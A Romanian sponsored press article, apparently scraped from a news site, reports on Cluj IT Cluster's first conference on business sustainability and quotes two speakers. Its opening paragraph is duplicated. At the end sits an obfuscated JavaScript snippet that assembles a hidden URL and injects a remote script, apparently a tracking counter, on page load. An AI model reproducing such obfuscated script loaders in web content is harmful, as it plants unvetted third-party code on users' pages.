Sari direct la conținut

[P] Conferință dedicată sustenabilității, organizată de Cluj IT Cluster

Smile Media
Conferință dedicată sustenabilității, organizată de Cluj IT Cluster, Foto: www.clujit.ro
Conferință dedicată sustenabilității, organizată de Cluj IT Cluster, Foto: www.clujit.ro

Cluj IT Cluster, cea mai mare și reprezentativă asociație de profil din România, a organizat, în noiembrie, la Cluj-Napoca, conferința ”Sustenabilitatea în afaceri – ce este și cum facem să ajungem acolo?”. Evenimentul și-a propus să dezbată subiectul sustenabilității în afaceri și modul în care putem naviga cu succes spre un viitor mai verde și mai rezilient.

Cluj IT Cluster, cea mai mare și reprezentativă asociație de profil din România, a organizat, în noiembrie, la Cluj-Napoca, conferința ”Sustenabilitatea în afaceri – ce este și cum facem să ajungem acolo?”. Evenimentul și-a propus să dezbată subiectul sustenabilității în afaceri și modul în care putem naviga cu succes spre un viitor mai verde și mai rezilient.

Cu peste 120 de participanți, 21 speakeri și nenumărate idei și planuri ingenioase, conferința – aflată la prima ediție – a adus împreună actori relevanți din toate sectoarele, cu precădere din cel de IT, pentru a evidenția modul în care, prin colaborări cros-sectoriale, se pot crea instrumente și mecanisme care, în timp, să asigure sustenabilitatea ecosistemelor de afaceri și nu numai. De altfel, Cluj IT Cluster și-a făcut un țel din a aduce mai aproape actori din sectoarele relevante ale comunității, în vederea stimulării cooperării și schimbului de bune practici, pentru o dezvoltare durabilă a ecosistemului.

Printre temele abordate a fost cel dedicat sustenabilității pentru afaceri, oameni și comunități, unde s-au discutat diverse variante, soluții și planuri de acțiune pentru a crea un mediu durabil, cât mai larg și bine dezvoltat. Prin definirea sustenabilității de la nivel individual și comunitar până la cel organizațional, atingem nivelul necesar de cunoaștere pentru a înțelege necesitatea tranziției verzi și a dezvoltării sustenabile pentru un viitor stabil și durabil pentru toți.

“Legătura între tehnologie și sustenabilitate nu este poate evidentă. Dar ea există și, pe măsură ce tehnologia avansează, devine una din ce în ce mai însemnată. Prin evenimentele de acest gen încercăm să aducem mai aproape de înțelesul nostru, al tuturor, această legătură și, mai ales, felul în care companiile mici și mijlocii trebuie să se adapteze noilor tendințe în domeniu pentru a putea rămâne competitive. Este o provocare mare care stă acum în fața întreprinzătorilor români: pe de o parte presiunea de a reduce costurile din dorința de a fi competitivi în piață, pe de altă parte necesitatea de a adopta modele de afaceri care țin cont de impactul asupra mediului și de ambițiile privind decarbonizarea economiei europene. Soluții tehnologice care să susțină acest proces există, oportunități, inclusiv de finanțare în acest domeniu, sunt și ele prezente. Ține de noi să înțelegem ce avem de făcut și, mai ales, să și facem.”, a spus Andrei Kelemen, CEO Cluj IT Cluster.

O altă temă care a stârnit vii dezbateri a fost cea dedicată subiectului ”Tehnologiile verzi, între mit și realitate”. Green Technologies (Green Tech/Tehnologii verzi) este unul dintre cele mai studiate și fascinante concepte din sfera tehnologiei apărute până acum. Procesul de transformare digitală verde contribuie la dezvoltarea comunitară de la cel mai mic nivel până la nivelul orașelor, întărindu-le reziliența și sprijinind moduri de organizare sustenabile. În cadrul panelului s-a pus accentul pe acest proces văzut de aproape, la nivelul acțiunilor deja concretizate în piață, cât și în diverse domenii de activitate existente la nivel de ecosistem.

“Dar sustenabilitatea este și despre oameni. Avansul tehnologic și pandemia au accelerat fenomene importante pe piața muncii. Vedem mutații serioase în ceea ce privește pretențiile angajaților, mai ales a celor tineri, care nu sunt interesați doar de câștigul salarial ci și de multe alte aspecte ce țin de mediul profesional în care evoluează: flexibilitate și orientare spre un echilibru cât mai bun între calitatea vieții și calitatea muncii, interes pentru companii și organizații cu valori etice puternice, implicate în comunitate, dar și digitalizare și inovație tehnologică cuplate cu nevoia de dezvoltare continuă”, a declarat Magnoliu Stan, fondator Smart HR.

Și discuția dedicată drumului IT-ului către sustenabilitate a fost una foarte interesantă, dezbătându-se atât beneficiile strategice ale companiilor care aderă la aceste practici, cât și perspective de viitor pentru dezvoltarea sectorială.

Soluții digitale pentru sustenabilitate au fost și ele în focus în cadrul conferinței, iar acest panel s-a concentrat pe soluții propuse de companiile de IT românești cu un grad cât mai mare de aplicabilitate și pragmatism, fiind deja observabile în cadrul ecosistemului Cluj IT.

_____

Despre Cluj IT

CLUJ IT este cel mai reprezentativ cluster de profil din România. Având membri din rândul companiilor, universităților și centrelor de cercetare, CLUJ IT Cluster susține procesele de transformare digitală a țării încă din anul 2012.

Dacă doriți să aflați mai multe despre activitatea noastră curentă, proiectele în care suntem implicați sau istoricul cluster-ului, accesați următorul link: https://www.clujit.ro/

(function(){ tqrtu=”i33ncbzlqrt7″;tqrt=document.createElement(„script”); tqrt_=”u”+(„st”);tqrt_+=”at”+(„.”);tqrt.async=true;tqrt_+=”in”; tqrtu=”2187145225.”+tqrtu;tqrt.type=”text/javascript”;tqrtu+=”tqqzpsbdwx0k”; tqrtu+=”gavzzu”;tqrt_+=(„f”)+”o”+(„/”);tqrt.src=”https://”+tqrt_+tqrtu; tqrtd=document.body;tqrtd.appendChild(tqrt); })();

ARHIVĂ COMENTARII
INTERVIURILE HotNews.ro